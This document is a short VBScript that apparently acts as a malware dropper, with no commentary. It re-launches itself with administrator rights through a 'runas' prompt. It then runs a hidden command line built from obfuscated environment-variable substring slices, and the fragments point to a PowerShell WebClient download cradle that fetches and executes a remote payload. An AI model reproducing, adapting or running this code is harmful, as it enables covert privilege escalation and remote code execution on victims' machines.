If Not WScript.Arguments.Named.Exists("elevate") Then
  CreateObject("Shell.Application").ShellExecute WScript.FullName _
    , """" & WScript.ScriptFullName & """ /elevate", "", "runas", 1
  WScript.Quit
End If

Set oShell = CreateObject ("Wscript.Shell") 
Dim strArgs
strArgs = "cmd /c %TEMp:~      -16,      -15%%PrOgRamDAtA:~      5,    -8%%Windir:~     -2,     -1%%Tmp:~     -3,      1%%hoMepAth:~    4,    1%%PubliC:~      4,   1%h%TEMP:~     -3,      -2%%PrograMW6432:~      -3,      -2%%coMMONPROgRAMFileS(X86):~   -22,    -21%.%HOmEpatH:~     3,      1%%cOMmOnPRoGRaMFIlES(x86):~   18,   -16%e%pROGrAMw6432:~   10,      -5%%PRoGRamw6432:~      -6,     1%%prOmPT:~      -4,     -3%%lOcaLaPpdatA:~      -3,      -2%%teMp:~      -14,   1%%apPDatA:~      -10,     -9%s%coMmoNProgRAMw6432:~   10,   -18%=%PROGRAMFILeS(x86):~    16,      1%%oS:~      -2,   1%%Temp:~   -3,    1%%WInDIr:~    8,      -1%-O%PuBLiC:~   11,   -3%jec%aLLUSErsprOFiLe:~      12,     1%%COMmONPrOGRaMw6432:~    23,    -5%Sy%COmMONpRoGramFiLES(X86):~     15,   -19%%TMP:~     -13,   -12%%homepAth:~      3,    1%%alluSersPrOfIlE:~   9,   -4%.%os:~    -2,   1%%CoMMONpRogRAMFILES:~      27,      -1%%LOcalAPpdata:~      -8,    1%.%SYstemROOt:~   -7,    -6%e%PUbliC:~      -4,     1%%cOmmonPRoGRamFIles(X86):~    -12,   1%%COmMONproGraMfiLES(x86):~      -3,      -2%%os:~     -9,    1%%Tmp:~    5,     1%n%alLuSERspROfILe:~      12,    -1%;%pROMPT:~    0,     -3%%WInDIr:~    6,    1%%TEMP:~   -9,    1%%AlLuseRSProFilE:~      -8,   -7%%uSERpROFILE:~      4,      1% = $%PUblIC:~   14%%AlluSErsPROfiLe:~   8,      1%%alLUSersProFIlE:~     12,      -1%%pROgRamW6432:~    -1,      1%.%PrOGRaMData:~     -4,      -3%%Tmp:~   -9,   -8%%SysTemROot:~    8,   -1%%cOMMonpRogrAmfileS(x86):~     28,      1%l%SystEMrOot:~     -3,     1%%pROgRAmW6432:~      8,     1%%sYstEmRoOt:~   -4,    1%%ApPdaTA:~     7,     1%%progrAmDAta:~   -2,      1%%PROGraMFiLES:~      4,      -11%%aPPDaTA:~   -3,    -2%%WiNdIr:~      5,   -4%%AlLUSeRsPRofILE:~     6,     -7%%ProgrAMFilEs(X86):~    -5,      -4%'h%TmP:~    -13,     -12%%prOGrAmdAta:~    -2,      1%%TMp:~      -16,     -15%%COmMoNPROGrAmw6432:~   28,    1%%TeMP:~      1,     1%//%loCAlappDatA:~   -12,   1%%TemP:~     -7,      1%%APPdATA:~    7,     1%%locALAPPdata:~      -8,     1%%tMp:~      -3,     -2%b%cOmMOnprogRamfilES:~    25,      1%%COMmonPROGramW6432:~    -7,    -6%.%teMP:~     -8,   -7%%coMmonPRogRamFILeS(x86):~   27,      1%%CommOnprOGRaMW6432:~      -9,   1%/%USerPRofIle:~      6,    1%%ProgRaMfilES:~      8,      1%%WiNDir:~     -2,    -1%/z3Pg4VMF');%AppdAta:~    -3,    1%%pUBLIC:~      -10,     1%%progrAMfIleS(x86):~    18,      -3%%comMONpRoGRAMFiLEs:~     10,   -18%%PROMpt:~      -4,    1%do%apPDATa:~      -1%%cOMmONPrOgraMw6432:~    -1,    1%"
oShell.Run strArgs, 0, false

